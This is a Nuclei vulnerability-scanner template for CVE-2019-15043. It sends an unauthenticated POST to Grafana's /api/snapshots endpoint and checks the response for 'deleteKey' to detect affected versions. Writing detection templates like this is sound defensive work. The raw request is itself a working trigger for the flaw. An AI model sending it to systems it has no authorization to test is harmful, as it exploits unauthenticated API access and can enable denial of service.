nuclei-templates/cves/2019/CVE-2019-15043.yaml

31 lines
1.1 KiB
YAML

id: CVE-2019-15043
info:
author: bing0o
name: Grafana unauthenticated API
severity: medium
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana
requests:
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers:
- part: body
type: word
words:
- deleteKey